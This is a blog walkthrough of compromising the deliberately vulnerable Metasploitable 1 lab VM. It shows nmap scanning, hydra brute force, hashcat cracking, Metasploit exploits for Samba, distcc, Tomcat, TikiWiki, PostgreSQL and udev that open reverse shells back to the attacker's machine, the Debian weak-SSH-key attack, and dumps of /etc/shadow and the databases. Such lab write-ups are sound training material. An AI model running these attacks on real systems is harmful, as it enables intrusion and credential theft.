Pentesting - Exploitation Guide Metasploitable 1

Metasploitable

Metasploitable is an Ubuntu 8.04 server installed on a VMWare 6.5 image with a number of vulnerable packages included, which can be run on most virtualization software.

You can grab your copy at Vulnhub – Metasploitable

I used Kali Linux for attacking and VirtualBox for virtualization.

Information Gathering

nmap is a great tool for scanning ports and finding network services on a machine.

We will run nmap with the following options:

-sV to probe open ports for service and version info

-O to fingerprint and try to guess the operating system

-p1-65535 to do a complete port scan

root@kali:~# nmap -sV -O 192.168.0.14 -p1-65535

Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-12 16:46 MDT

Nmap scan report for 192.168.0.14

Host is up (0.00073s latency).

Not shown: 65522 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp ProFTPD 1.3.1

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

23/tcp open telnet Linux telnetd

25/tcp open smtp Postfix smtpd

53/tcp open domain ISC BIND 9.4.2

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7

8009/tcp open ajp13 Apache Jserv (Protocol v1.3)

8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1

MAC Address: 08:00:27:EE:93:3E (Cadmus Computer Systems)

Device type: general purpose

Running: Linux 2.6.X

OS CPE: cpe:/o:linux:linux_kernel:2.6

OS details: Linux 2.6.9 - 2.6.33

Network Distance: 1 hop

Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 21.34 seconds

Attacking Passwords and Cracking Hashes

First, we try to attack weak passwords and crack any password hashes we have found before trying to locate or exploit a vulnerability on the machine. In this section I have gathered the usernames, passwords and hashes beforehand in order to better demonstrate the use of the following tools.

SSH Bruteforce

hydra is a great tool for bruteforcing network services. Although it is tedious to bruteforce SSH, it is still important to have the know how.

We will run hydra with the -C option to pass a colon separated file containing usernames and passwords

root@kali:~# hydra -C metasploitableuserpass.txt 192.168.0.14 ssh

Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-12 17:10:04

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries, ~0 tries per task

[DATA] attacking service ssh on port 22

[22][ssh] host: 192.168.0.14 login: msfadmin password: msfadmin

[22][ssh] host: 192.168.0.14 login: postgres password: postgres

[22][ssh] host: 192.168.0.14 login: service password: service

[22][ssh] host: 192.168.0.14 login: klog password: 123456789

[22][ssh] host: 192.168.0.14 login: user password: user

[22][ssh] host: 192.168.0.14 login: sys password: batman

1 of 1 target successfully completed, 6 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-12 17:10:04

Telnet Bruteforce

We can use hydra once again to bruteforce the telnet service running on the system. We once again use the -C option.

root@kali:~# hydra -C metasploitableuserpass.txt 192.168.0.14 telnet

Hydra (http://www.thc.org/thc-hydra) starting at 2015-06-12 20:27:15

[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available

[DATA] max 6 tasks per 1 server, overall 64 tasks, 6 login tries, ~0 tries per task

[DATA] attacking service telnet on port 23

[23][telnet] host: 192.168.0.14 login: user password: user

[23][telnet] host: 192.168.0.14 login: sys password: batman

[23][telnet] host: 192.168.0.14 login: klog password: 123456789

[23][telnet] host: 192.168.0.14 login: postgres password: postgres

[23][telnet] host: 192.168.0.14 login: msfadmin password: msfadmin

[23][telnet] host: 192.168.0.14 login: service password: service

1 of 1 target successfully completed, 6 valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2015-06-12 20:27:20

Cracking Hashes

From the bruteforced SSH accounts, we can find the password hashes for accounts on the system by using reading the contents of the /etc/shadow file and proceed to crack the hashes using hashcat

We use the -m option to specify the type of hash being passed and also add a wordlist of possible passwords to reduce the time required to crack the hash.

root@kali:~# hashcat -m 500 metasploitablehash.txt metasploitablepass.txt

Initializing hashcat v0.49 with 1 threads and 32mb segment-size...

Added hashes from file /root/metasploitablehash.txt: 7 (7 salts)

NOTE: press enter for status-screen

$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:batman

$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:123456789

$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:msfadmin

$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:user

$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:postgres

$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:service

Input.Mode: Dict (/root/metasploitablepass.txt)

Index.....: 1/1 (segment), 6 (words), 48 (bytes)

Recovered.: 6/7 hashes, 6/7 salts

Speed/sec.: - plains, - words

Progress..: 6/6 (100.00%)

Running...: --:--:--:--

Estimated.: --:--:--:--

Started: Fri Jun 12 17:01:19 2015

Stopped: Fri Jun 12 17:01:19 2015

Exploitation and Privilege Escalation

Samba

The version of Samba running on the box is vulnerable to Samba “username map script” Command Execution and can be exploited using the Metasploit module.

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.0.14 yes The target address

RPORT 139 yes The target port

Payload options (cmd/unix/reverse):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.0.13 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(usermap_script) > run

[*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo zvN93GNFfTvnAR16;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "zvN93GNFfTvnAR16\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 4 opened (192.168.0.13:4444 -> 192.168.0.14:43221) at 2015-06-12 17:26:04 -0600

uid=0(root) gid=0(root)

This version of samba is also vulnerable to Samba Symlink Directory Traversal due to the presence of a writable share on the system which can be identified using the enum4linux tool.

root@kali:~# enum4linux 192.168.0.14

WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 14 17:17:02 2015

==========================

| Target Information |

==========================

Target ........... 192.168.0.14

...

[+] Attempting to map shares on 192.168.0.14

//192.168.0.14/print$ Mapping: DENIED, Listing: N/A

//192.168.0.14/tmp Mapping: OK, Listing: OK

//192.168.0.14/opt Mapping: DENIED, Listing: N/A

...

We can see that the tmp share is writable and leverage this to exploit the directory traversal vulnerability.

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.0.14 yes The target address

RPORT 445 yes Set the SMB service port

SMBSHARE tmp yes The name of a writeable share on the server

SMBTARGET rootfs yes The name of the directory that should point to the root filesystem

msf auxiliary(samba_symlink_traversal) > run

[*] Connecting to the server...

[*] Trying to mount writeable share 'tmp'...

[*] Trying to link 'rootfs' to the root filesystem...

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.0.14\tmp\rootfs\

[*] Auxiliary module execution completed

We can now use the smbclient command to browse the disk and gather authorized SSH keys for the system or even add our own keys as authorized SSH keys.

root@kali:~# smbclient //192.168.0.14/tmp

Enter root's password:

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs\/root/.ssh/

smb: \rootfs\root\.ssh\> get authorized_keys

getting file \rootfs\root\.ssh\authorized_keys of size 405 as authorized_keys (197.7 KiloBytes/sec) (average 197.8 KiloBytes/sec)

smb: \rootfs\root\.ssh\> ^C

root@kali:~# cat authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

We can use this information to exploit the Debian OpenSSH Predictable PRNG exploit illustrated further on in this post.

distcc

The distcc program has a daemon running as a network service which is vulnerable to DistCC Daemon Command Execution and can be exploited using the Metasploit module.

msf > use exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.0.14 yes The target address

RPORT 3632 yes The target port

Payload options (cmd/unix/reverse):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.0.13 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Target

msf exploit(distcc_exec) > run

[*] Started reverse double handler

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo jjkbNNf5ZM9T9S8f;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "jjkbNNf5ZM9T9S8f\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 5 opened (192.168.0.13:4444 -> 192.168.0.14:41599) at 2015-06-12 17:30:07 -0600

uid=1(daemon) gid=1(daemon) groups=1(daemon)

Apache Tomcat

The Apache Tomcat service uses the default credentials tomcat/tomcat which allows us to deploy arbitrary JSP applications and gain a shell on the machine.

We can exploit this using the module Apache Tomcat Manager Application Deployer Authenticated Code Execution or Apache Tomcat Manager Authenticated Upload Code Execution. The only difference between the modules is that the former uses a PUT request to upload the payload whereas the the latter uses a POST request to the /manager/html/upload application of Tomcat to upload the payload.

msf > use exploit/multi/http/tomcat_mgr_deploy

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD tomcat no The password for the specified username

PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOST 192.168.0.14 yes The target address

RPORT 8180 yes The target port

USERNAME tomcat no The username to authenticate as

VHOST no HTTP server virtual host

Payload options (java/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.0.13 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(tomcat_mgr_deploy) > run

[*] Started reverse handler on 192.168.0.13:4444

[*] Attempting to automatically select a target...

[*] Automatically selected target "Linux x86"

[*] Uploading 6473 bytes as DW4jt5FInhZE9yysl2qFBXquq.war ...

[*] Executing /DW4jt5FInhZE9yysl2qFBXquq/4JE8SRGFoTspH3bDjPjRNHrqjdjHh.jsp...

[*] Undeploying DW4jt5FInhZE9yysl2qFBXquq ...

[*] Sending stage (30680 bytes) to 192.168.0.14

[*] Meterpreter session 7 opened (192.168.0.13:4444 -> 192.168.0.14:59015) at 2015-06-12 17:57:23 -0600

meterpreter > getuid

Server username: tomcat55

Apache httpd Webserver

The Apache webserver is not vulnerable in itself but it does host vulnerable applications. We can use dirb to crawl the webserver and locate possibly vulnerable applications.

We use the -r option with dirb to not search within directories recursively as we are only trying to locate vulnerable applications for now. In usual scans, recursive search is a great tool to locate sensitive information or otherwise hidden vulnerable applications.

root@kali:~# dirb http://192.168.0.14 /usr/share/wordlists/dirb/big.txt -r

-----------------

DIRB v2.21

By The Dark Raver

-----------------

START_TIME: Fri Jun 12 18:35:53 2015

URL_BASE: http://192.168.0.14/

WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

OPTION: Not Recursive

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.0.14/ ----

+ http://192.168.0.14/cgi-bin/ (CODE:403|SIZE:328)

+ http://192.168.0.14/index (CODE:200|SIZE:45)

+ http://192.168.0.14/phpinfo (CODE:200|SIZE:47560)

+ http://192.168.0.14/server-status (CODE:403|SIZE:333)

==> DIRECTORY: http://192.168.0.14/tikiwiki/

==> DIRECTORY: http://192.168.0.14/twiki/

-----------------

DOWNLOADED: 20458 - FOUND: 4

TikiWiki

The TikiWiki web application has two vulnerabilities, TikiWiki Information Disclosure and TikiWiki tiki-graph_formula Remote PHP Code Execution.

We will exploit both these vulnerabilities using the second module mentioned above which includes the information disclosure exploit.

msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec

msf exploit(tikiwiki_graph_formula_exec) > show options

Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):

Name Current Setting Required Description

---- --------------- -------- -----------

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOST 192.168.0.14 yes The target address

RPORT 80 yes The target port

URI /tikiwiki yes TikiWiki directory path

VHOST no HTTP server virtual host

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(tikiwiki_graph_formula_exec) > run

[*] Started reverse handler on 192.168.0.13:4444

[*] Attempting to obtain database credentials...

[*] The server returned : 200 OK

[*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch

[*] TikiWiki database informations :

db_tiki : mysql

dbversion : 1.9

host_tiki : localhost

user_tiki : root

pass_tiki : root

dbs_tiki : tikiwiki195

[*] Attempting to execute our payload...

[*] Sending stage (40499 bytes) to 192.168.0.14

[*] Meterpreter session 8 opened (192.168.0.13:4444 -> 192.168.0.14:56372) at 2015-06-12 18:41:35 -0600

meterpreter > getuid

Server username: www-data (33)

Debian OpenSSH

The OpenSSH version running on the system is vulnerable to the Debian’s OpenSSL Library Predictable Random Number Generator exploit.

For this, we will need to acquire a list of authorized keys which we can do using an unprivileged shell by reading the /root/.ssh/authorized_keys file.

cat /root/.ssh/authorized_keys

Now that we have an authorized key, we need to find out the private key paired with the authorized public key. We can get the archive of compromised key pairs provided by the folks at Offensive Security on their Github – RSA 2048.

After extracting the archive, we can locate the private key file paired with the public key and use it to SSH in as the root user.

root@kali:~/rsa/2048# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== *.pub

57c3115d77c56390332dc5c49978627a-5429.pub

root@kali:~# ssh -i /rsa/2048/57c3115d77c56390332dc5c49978627a-5429 root@192.168.0.14

Public key 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a blacklisted (see ssh-vulnkey(1)); continuing anyway

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

You have mail.

root@metasploitable:~# id

uid=0(root) gid=0(root) groups=0(root)

PostgreSQL

The PostgreSQL service running on the system uses default credentials and can be exploited to gain a shell on the system using the PostgreSQL for Linux Payload Execution Metasploit module.

msf > use exploit/linux/postgres/postgres_payload

msf exploit(postgres_payload) > show options

Module options (exploit/linux/postgres/postgres_payload):

Name Current Setting Required Description

---- --------------- -------- -----------

DATABASE template1 yes The database to authenticate against

PASSWORD postgres no The password for the specified username. Leave blank for a random password.

RHOST 192.168.0.14 yes The target address

RPORT 5432 yes The target port

USERNAME postgres yes The username to authenticate as

VERBOSE false no Enable verbose output

Payload options (generic/shell_reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.168.0.13 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Linux x86

msf exploit(postgres_payload) > run

[*] Started reverse handler on 192.168.0.13:4444

[*] 192.168.0.14:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

[*] Uploaded as /tmp/BpmBaUTU.so, should be cleaned up automatically

[*] Command shell session 3 opened (192.168.0.13:4444 -> 192.168.0.14:34466) at 2015-06-14 14:41:37 -0600

uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)

Privilege Escalation

The Linux kernel version can be found by running uname -a on a shell on the Metasploitable box.

meterpreter > shell

Process 6071 created.

Channel 5 created.

uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

This kernel version is vulnerable to Linux udev Netlink Local Privilege Escalation.

We can use the relevant metasploit module to exploit this vulnerability.

msf > use exploit/linux/local/udev_netlink

msf exploit(udev_netlink) > show options

Module options (exploit/linux/local/udev_netlink):

Name Current Setting Required Description

---- --------------- -------- -----------

NetlinkPID no Usually udevd pid-1. Meterpreter sessions will autodetect

SESSION 8 yes The session to run this module on.

WritableDir /tmp yes A directory where we can write files (must not be mounted noexec)

Exploit target:

Id Name

-- ----

0 Linux x86

msf exploit(udev_netlink) > run

[*] Started reverse handler on 192.168.0.13:4444

[*] Attempting to autodetect netlink pid...

[*] Meterpreter session, using get_processes to find netlink pid

[*] udev pid: 2655

[+] Found netlink pid: 2654

[*] Writing payload executable (152 bytes) to /tmp/BSsWpWUGOB

[*] Writing exploit executable (1879 bytes) to /tmp/dFDoNsoNgO

[*] chmod'ing and running it...

[*] Command shell session 9 opened (192.168.0.13:4444 -> 192.168.0.14:56373) at 2015-06-12 18:45:17 -0600

uid=0(root) gid=0(root)

Post Exploitation

Password Hashes

As root user, we can easily grab password hashes from the machine.

root@metasploitable:~# cat /etc/shadow

root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::

daemon:*:14684:0:99999:7:::

bin:*:14684:0:99999:7:::

sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::

sync:*:14684:0:99999:7:::

games:*:14684:0:99999:7:::

man:*:14684:0:99999:7:::

lp:*:14684:0:99999:7:::

mail:*:14684:0:99999:7:::

news:*:14684:0:99999:7:::

uucp:*:14684:0:99999:7:::

proxy:*:14684:0:99999:7:::

www-data:*:14684:0:99999:7:::

backup:*:14684:0:99999:7:::

list:*:14684:0:99999:7:::

irc:*:14684:0:99999:7:::

gnats:*:14684:0:99999:7:::

nobody:*:14684:0:99999:7:::

libuuid:!:14684:0:99999:7:::

dhcp:*:14684:0:99999:7:::

syslog:*:14684:0:99999:7:::

klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::

sshd:*:14684:0:99999:7:::

msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::

bind:*:14685:0:99999:7:::

postfix:*:14685:0:99999:7:::

ftp:*:14685:0:99999:7:::

postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::

mysql:!:14685:0:99999:7:::

tomcat55:*:14691:0:99999:7:::

distccd:*:14698:0:99999:7:::

user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::

service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::

telnetd:*:14715:0:99999:7:::

proftpd:!:14727:0:99999:7:::

MySQL Database Compromise

The MySQL database present on the system uses the default credentials of root/root and the database can be compromised to disclose sensitive data.

root@metasploitable:~# mysql -p

Enter password:

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 27

Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;

+--------------------+

| Database |

+--------------------+

| information_schema |

| mysql |

| tikiwiki |

| tikiwiki195 |

+--------------------+

4 rows in set (0.00 sec)

PostgreSQL Database Compromise

The PostgreSQL installation on the box also uses default credentials postgres/postgres and can be compromised to disclose sensitive data. To access this database we need to switch to the postgres user with password postgres.

root@metasploitable:~# su postgres

postgres@metasploitable:/root$ psql -U postgres

Welcome to psql 8.3.1, the PostgreSQL interactive terminal.

Type: \copyright for distribution terms

\h for help with SQL commands

\? for help with psql commands

\g or terminate with semicolon to execute query

\q to quit

postgres=# \l

List of databases

Name | Owner | Encoding

-----------+----------+----------

postgres | postgres | UTF8

template0 | postgres | UTF8

template1 | postgres | UTF8

(3 rows)

Search This Blog

Qais Hussainy